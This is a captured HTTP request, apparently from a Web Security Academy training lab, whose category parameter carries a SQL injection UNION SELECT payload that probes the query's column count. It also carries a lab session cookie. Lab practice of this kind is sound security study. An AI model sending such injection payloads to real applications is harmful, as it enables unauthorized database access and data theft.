GET /filter?category=Gifts'+UNION+SELECT+NULL,NULL,NULL-- HTTP/1.1
Host: ac5f1f2d1e16f97b80583fe400ed009e.web-security-academy.net
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac5f1f2d1e16f97b80583fe400ed009e.web-security-academy.net/filter?category=Tech+gifts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=OwBe3DFn2YtK3Sdo1yzbtkY6WJy16gyQ
